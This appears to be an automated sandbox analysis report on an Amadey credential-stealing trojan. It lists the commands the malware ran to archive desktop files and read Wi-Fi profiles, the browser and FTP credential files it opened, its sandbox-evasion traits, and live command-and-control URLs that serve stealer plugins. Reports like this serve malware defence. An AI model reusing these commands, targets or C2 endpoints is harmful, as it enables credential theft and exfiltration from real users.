                                Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal
                                Source: explorha.exe, explorha.exe, 00000006.00000002.3040681219.0000000000A8D000.00000040.00000001.01000000.00000008.sdmp Binary or memory string: gProgram Manager
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 6_2_0087F436 cpuid
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Queries volume information: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Queries volume information: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeQueries volume information: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeQueries volume information: C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeQueries volume information: C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll VolumeInformationJump to behavior
                                Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\CURQNKVOIX.xlsx VolumeInformationJump to behavior
                                Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\JSDNGYCOWY.docx VolumeInformationJump to behavior
                                Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\JSDNGYCOWY.xlsx VolumeInformationJump to behavior
                                Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\KZWFNRXYKI.docx VolumeInformationJump to behavior
                                Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\NIKHQAIQAU.docx VolumeInformationJump to behavior
                                Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\NIKHQAIQAU.xlsx VolumeInformationJump to behavior
                                Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\RAYHIWGKDI.xlsx VolumeInformationJump to behavior
                                Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\ZBEDCJPBEY.docx VolumeInformationJump to behavior
                                Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip VolumeInformationJump to behavior
                                Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip VolumeInformationJump to behavior
                                Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip VolumeInformationJump to behavior
                                Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe Code function: 0_2_00E2E27A GetSystemTimePreciseAsFileTime, GetSystemTimePreciseAsFileTime, 0_2_00E2E27A
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 6_2_00866160 LookupAccountNameA, 6_2_00866160

                                Lowering of HIPS / PFW / Operating System Security Settings

                                Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles

                                Stealing of Sensitive Information

                                Source: Yara match File source: 11.2.rundll32.exe.6c980000.0.unpack, type: UNPACKEDPE
                                Source: Yara match File source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll, type: DROPPED
                                Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\clip64[1].dll, type: DROPPED
                                Source: Yara match File source: 6.2.explorha.exe.860000.0.unpack, type: UNPACKEDPE
                                Source: Yara match File source: 2.2.explorha.exe.860000.0.unpack, type: UNPACKEDPE
                                Source: Yara match File source: 0.2.SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe.e10000.0.unpack, type: UNPACKEDPE
                                Source: Yara match File source: 1.2.explorha.exe.860000.0.unpack, type: UNPACKEDPE
                                Source: Yara match File source: 0000000B.00000002.3040424811.000000006C981000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY
                                Source: Yara match File source: 00000000.00000003.1798578952.0000000005450000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara match File source: 00000000.00000002.1885241101.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                                Source: Yara match File source: 00000006.00000003.2311033083.00000000047E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara match File source: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
                                Source: Yara match File source: 00000001.00000003.1844272709.0000000004CD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara match File source: 00000002.00000002.1908539379.0000000000861000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
                                Source: Yara match File source: 00000001.00000002.1884728884.0000000000861000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
                                Source: Yara match File source: 00000002.00000003.1868196075.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\cred64[1].dll, type: DROPPED
                                Source: Yara match File source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, type: DROPPED
                                Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
                                Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\logins.json
                                Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                                Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\CocCoc\Browser\User Data\Default\Login Data
                                Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Chedot\User Data\Default\Login Data
                                Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login Data
                                Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Vivaldi\User Data\Default\Login Data
                                Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\CentBrowser\User Data\Default\Login Data
                                Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Chromium\User Data\Default\Login Data
                                Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json
                                Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Orbitum\User Data\Default\Login Data
                                Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Comodo\Dragon\User Data\Default\Login Data
                                Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\logins.json
                                Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\sitemanager.xml
                                Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Roaming\.purple\accounts.xml
                                Source: C:\Windows\System32\rundll32.exe File opened: C:\.purple\accounts.xml
                                Source: C:\Windows\System32\rundll32.exe File opened: C:\Windows\System32\.purple\accounts.xml
                                Source: C:\Windows\System32\rundll32.exe File opened: C:\Windows\.purple\accounts.xml
                                Source: C:\Windows\System32\rundll32.exe File opened: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\.purple\accounts.xml
                                Source: C:\Windows\System32\rundll32.exe File opened: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\.purple\accounts.xml
                                Source: C:\Windows\System32\rundll32.exe File opened: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\.purple\accounts.xml
                                Source: C:\Windows\System32\rundll32.exe File opened: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\.purple\accounts.xml
                                Source: C:\Windows\System32\rundll32.exe File opened: C:\Windows\ImmersiveControlPanel\.purple\accounts.xml
                                Source: C:\Windows\System32\rundll32.exe File opened: C:\Windows\System32\oobe\.purple\accounts.xml
                                Source: C:\Windows\System32\rundll32.exe File opened: C:\Program Files (x86)\OtntNNdpqYyQMUiSAQysCOlFcPDwPwakinULXKhkkyvGQAUcfRRvkfpLZMMaaOTCuIuDlXU\.purple\accounts.xml
                                Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Temp\09fd851a4f\.purple\accounts.xml
                                Source: C:\Windows\System32\rundll32.exe File opened: C:\Windows\SysWOW64\.purple\accounts.xml
                                Source: C:\Windows\System32\rundll32.exe File opened: C:\Windows\System32\{6D809377-6AF0-444B-8957-A3773F02200E}\Common Files\microsoft shared\ClickToRun\.purple\accounts.xml
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 6_2_008902D8 Concurrency::details::ContextBase::TraceContextEvent, Concurrency::details::SchedulerBase::GetInternalContext, Concurrency::details::WorkItem::ResolveToken, Concurrency::details::WorkItem::BindTo, 6_2_008902D8
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 6_2_0088F5E1 Concurrency::details::SchedulerBase::GetInternalContext, Concurrency::details::WorkItem::ResolveToken, Concurrency::details::WorkItem::BindTo, Concurrency::details::SchedulerBase::GetInternalContext, 6_2_0088F5E1
                                Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                                Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Disable or Modify Tools | 2 OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 12 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                                Credentials | Domains | Default Accounts | 2 Command and Scripting Interpreter | 1 Scheduled Task/Job | 112 Process Injection | 1 Deobfuscate/Decode Files or Information | 1 Credentials in Registry | 1 Account Discovery | Remote Desktop Protocol | 2 Data from Local System | 1 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
                                Email Addresses | DNS Server | Domain Accounts | 1 Scheduled Task/Job | Logon Script (Windows) | 1 Scheduled Task/Job | 3 Obfuscated Files or Information | 1 Credentials In Files | 2 File and Directory Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                                Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 12 Software Packing | NTDS | 225 System Information Discovery | Distributed Component Object Model | Input Capture | 112 Application Layer Protocol | Traffic Duplication | Data Destruction
                                Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 741 Security Software Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                                Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 11 Masquerading | Cached Domain Credentials | 2 Process Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                                DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 251 Virtualization/Sandbox Evasion | DCSync | 251 Virtualization/Sandbox Evasion | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                                Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 112 Process Injection | Proc Filesystem | 1 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                                Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 Rundll32 | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
                                Behavior Graph
                                ID: 1428513
                                Sample: SecuriteInfo.com.Win32.Evo-...
                                Startdate: 19/04/2024
                                Architecture: WINDOWS
                                Score: 100
                                Signatures: Snort IDS alert for network traffic; Multi AV Scanner detection for domain / URL; Found malware configuration; 13 other signatures

                                Process tree:
                                • explorha.exe (started)
                                    DNS/IP: 193.233.132.56, 49735, 49736, 49737 FREE-NET-ASFREEnetEU Russian Federation
                                    Dropped: C:\Users\user\AppData\Roaming\...\cred64.dll, PE32+
                                    Dropped: C:\Users\user\AppData\Roaming\...\clip64.dll, PE32
                                    Dropped: C:\Users\user\AppData\Local\...\clip64[1].dll, PE32
                                    Dropped: C:\Users\user\AppData\Local\...\cred64[1].dll, PE32+
                                    Signatures: Hides threads from debuggers; Tries to detect sandboxes / dynamic malware analysis system (registry check); Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                                    • rundll32.exe (started)
                                        • rundll32.exe (started)
                                            Signatures: Tries to steal Instant Messenger accounts or passwords; Uses netsh to modify the Windows network and firewall settings; Tries to harvest and steal ftp login credentials; 2 other signatures
                                            • powershell.exe (started)
                                                Dropped: C:\Users\user\...\246122658369_Desktop.zip, Zip
                                                Signatures: Loading BitLocker PowerShell Module
                                                • conhost.exe (started)
                                            • netsh.exe (started)
                                                • conhost.exe (started)
                                    • rundll32.exe (started)
                                        Signatures: System process connects to network (likely due to code injection or exploit)
                                • explorha.exe (started)
                                    Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Detected unpacking (changes PE section rights); 3 other signatures
                                • SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe (started)
                                    Dropped: C:\Users\user\AppData\Local\...\explorha.exe, PE32
                                    Signatures: Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors); Tries to evade debugger and weak emulator (self modifying code); Tries to detect virtualization through RDTSC time measurements
                                    • explorha.exe (started)
                                        Signatures: Hides threads from debuggers; Tries to detect sandboxes / dynamic malware analysis system (registry check); Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

| Source | Detection | Scanner | Label |
|---|---|---|---|
| SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe | 45% | ReversingLabs | Win32.Trojan.Generic |
| SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe | 54% | Virustotal | |
| SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe | 100% | Avira | TR/Crypt.TPM.Gen |
| SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe | 100% | Joe Sandbox ML | |

| Source | Detection | Scanner | Label |
|---|---|---|---|
| C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe | 100% | Avira | TR/Crypt.TPM.Gen |
| C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll | 100% | Avira | TR/ClipBanker.pjgxt |
| C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\cred64[1].dll | 100% | Avira | TR/PSW.Agent.szlsq |
| C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\clip64[1].dll | 100% | Avira | TR/ClipBanker.pjgxt |
| C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll | 100% | Avira | TR/PSW.Agent.szlsq |
| C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe | 100% | Joe Sandbox ML | |
| C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\cred64[1].dll | 71% | ReversingLabs | Win64.Trojan.Amadey |
| C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\cred64[1].dll | 78% | Virustotal | |
| C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\clip64[1].dll | 82% | ReversingLabs | Win32.Trojan.Amadey |
| C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\clip64[1].dll | 80% | Virustotal | |
| C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe | 45% | ReversingLabs | Win32.Trojan.Generic |
| C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe | 54% | Virustotal | |
| C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll | 82% | ReversingLabs | Win32.Trojan.Amadey |
| C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll | 80% | Virustotal | |
| C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll | 71% | ReversingLabs | Win64.Trojan.Amadey |
| C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll | 78% | Virustotal | |
                                No Antivirus matches
                                No Antivirus matches
| Source | Detection | Scanner | Label |
|---|---|---|---|
| http://pesterbdd.com/images/Pester.png | 100% | URL Reputation | malware |
| http://pesterbdd.com/images/Pester.png | 100% | URL Reputation | malware |
| https://contoso.com/License | 0% | URL Reputation | safe |
| https://contoso.com/Icon | 0% | URL Reputation | safe |
| https://contoso.com/ | 0% | URL Reputation | safe |
                                No contacted domains info
| Name | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|
| http://193.233.132.56/Pneh2sXQk0/index.php | true | | unknown |
| http://193.233.132.56/Pneh2sXQk0/index.php?wal=1 | true | | unknown |
| http://193.233.132.56/Pneh2sXQk0/Plugins/clip64.dll | true | | unknown |
| http://193.233.132.56/Pneh2sXQk0/Plugins/cred64.dll | true | | unknown |
| IP | Domain | Country | ASN | ASN Name | Malicious |
|---|---|---|---|---|---|
| 193.233.132.56 | unknown | Russian Federation | 2895 | FREE-NET-ASFREEnetEU | true |
                                                            Joe Sandbox version:40.0.0 Tourmaline
                                                            Analysis ID:1428513
                                                            Start date and time:2024-04-19 04:24:06 +02:00
                                                            Joe Sandbox product:CloudBasic
                                                            Overall analysis duration:0h 9m 33s
                                                            Hypervisor based Inspection enabled:false
                                                            Report type:full
                                                            Cookbook file name:default.jbs
                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                            Number of analysed new started processes analysed:15
                                                            Number of new started drivers analysed:0
                                                            Number of existing processes analysed:0
                                                            Number of existing drivers analysed:0
                                                            Number of injected processes analysed:0
                                                            Technologies:
                                                            • HCA enabled
                                                            • EGA enabled
                                                            • AMSI enabled
                                                            Analysis Mode:default
                                                            Analysis stop reason:Timeout
                                                            Sample name:SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe
                                                            Detection:MAL
                                                            Classification:mal100.phis.troj.spyw.evad.winEXE@17/21@0/1
                                                            EGA Information:
                                                            • Successful, ratio: 100%
                                                            HCA Information:Failed
                                                            Cookbook Comments:
                                                            • Found application associated with file extension: .exe
                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                            • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                            • Not all processes where analyzed, report is missing behavior information
                                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                            • Report size getting too big, too many NtCreateKey calls found.
                                                            • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                            • Report size getting too big, too many NtEnumerateKey calls found.
                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                            • Report size getting too big, too many NtQueryValueKey calls found.
| Time | Type | Description |
|---|---|---|
| 03:25:12 | Task Scheduler | Run new task: explorha path: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe |
| 04:26:02 | API Interceptor | 521176x Sleep call for process: explorha.exe modified |
| 04:26:08 | API Interceptor | 18x Sleep call for process: powershell.exe modified |
| 04:26:41 | API Interceptor | 129x Sleep call for process: rundll32.exe modified |
Match: 193.233.132.56

| Associated Sample Name / URL | Detection | Threat Name | Context |
|---|---|---|---|
| SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe | malicious | Amadey, RedLine, RisePro Stealer | 193.233.132.56/Pneh2sXQk0/index.php |
| UeW2b6mU6Z.exe | malicious | Amadey, RisePro Stealer | 193.233.132.56/Pneh2sXQk0/index.php |
| SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe | malicious | Amadey, RisePro Stealer | 193.233.132.56/Pneh2sXQk0/index.php |
| SecuriteInfo.com.Win32.PWSX-gen.580.27252.exe | malicious | Amadey, RisePro Stealer | 193.233.132.56/Pneh2sXQk0/index.php?wal=1 |
| 4fMLTRkOfB.exe | malicious | Amadey, RisePro Stealer | 193.233.132.56/Pneh2sXQk0/index.php |
| file.exe | malicious | Amadey, RisePro Stealer | 193.233.132.56/Pneh2sXQk0/index.php |
| SecuriteInfo.com.Win32.PWSX-gen.29653.14309.exe | malicious | Amadey, RisePro Stealer | 193.233.132.56/Pneh2sXQk0/index.php |
| SecuriteInfo.com.Win32.PWSX-gen.29871.25289.exe | malicious | Amadey, RisePro Stealer | 193.233.132.56/Pneh2sXQk0/index.php |
| V28EuIqeda.exe | malicious | LummaC, PureLog Stealer, RisePro Stealer | 193.233.132.56/Pneh2sXQk0/index.php |
| SecuriteInfo.com.Win32.PWSX-gen.14048.7584.exe | malicious | LummaC, Amadey, LummaC Stealer, PureLog Stealer, RisePro Stealer | 193.233.132.56/Pneh2sXQk0/index.php |
                                                            No context
Match: FREE-NET-ASFREEnetEU

| Associated Sample Name / URL | Detection | Threat Name | Context |
|---|---|---|---|
| SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe | malicious | Amadey, RedLine, RisePro Stealer | 193.233.132.167 |
| SecuriteInfo.com.Win64.Evo-gen.32634.31069.exe | malicious | LummaC, Glupteba, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer | 193.233.132.226 |
| UeW2b6mU6Z.exe | malicious | Amadey, RisePro Stealer | 193.233.132.167 |
| tA6etkt3gb.exe | malicious | Amadey, PureLog Stealer, RedLine, RisePro Stealer, zgRAT | 193.233.132.167 |
| Cheater Pro 1.6.0.msi | malicious | Unknown | 185.103.100.31 |
| Cheat Lab 2.7.2.msi | malicious | Unknown | 147.45.67.1 |
| file.exe | malicious | RisePro Stealer | 147.45.47.93 |
| dendy.exe | malicious | RisePro Stealer | 147.45.47.93 |
| SecuriteInfo.com.Win64.CrypterX-gen.2144.26023.exe | malicious | Glupteba, PureLog Stealer, zgRAT | 193.233.132.175 |
| Q73YlTAmWe.exe | malicious | RisePro Stealer | 147.45.47.93 |
                                                            No context
Match: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\cred64[1].dll

| Associated Sample Name / URL | Detection | Threat Name |
|---|---|---|
| SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe | malicious | Amadey, RedLine, RisePro Stealer |
| UeW2b6mU6Z.exe | malicious | Amadey, RisePro Stealer |
| tA6etkt3gb.exe | malicious | Amadey, PureLog Stealer, RedLine, RisePro Stealer, zgRAT |
| SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe | malicious | Amadey, RisePro Stealer |
| l2ZKczbGRq.exe | malicious | Amadey, PureLog Stealer, RedLine, RisePro Stealer, zgRAT |
| SecuriteInfo.com.Win32.TrojanX-gen.1033.1898.exe | malicious | Amadey, Mars Stealer, PureLog Stealer, RisePro Stealer, SmokeLoader, Stealc, Vidar |
| a5PfQvvi4y.exe | malicious | LummaC, Amadey, LummaC Stealer, PureLog Stealer, RedLine, RisePro Stealer, SmokeLoader |
| 4fMLTRkOfB.exe | malicious | Amadey, RisePro Stealer |
| file.exe | malicious | Amadey, RisePro Stealer |
| SecuriteInfo.com.Win32.PWSX-gen.29871.25289.exe | malicious | Amadey, RisePro Stealer |

Match: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\clip64[1].dll

| Associated Sample Name / URL | Detection | Threat Name |
|---|---|---|
| SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe | malicious | Amadey, RedLine, RisePro Stealer |
| UeW2b6mU6Z.exe | malicious | Amadey, RisePro Stealer |
| tA6etkt3gb.exe | malicious | Amadey, PureLog Stealer, RedLine, RisePro Stealer, zgRAT |
| SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe | malicious | Amadey, RisePro Stealer |
| l2ZKczbGRq.exe | malicious | Amadey, PureLog Stealer, RedLine, RisePro Stealer, zgRAT |
| SecuriteInfo.com.Win32.TrojanX-gen.1033.1898.exe | malicious | Amadey, Mars Stealer, PureLog Stealer, RisePro Stealer, SmokeLoader, Stealc, Vidar |
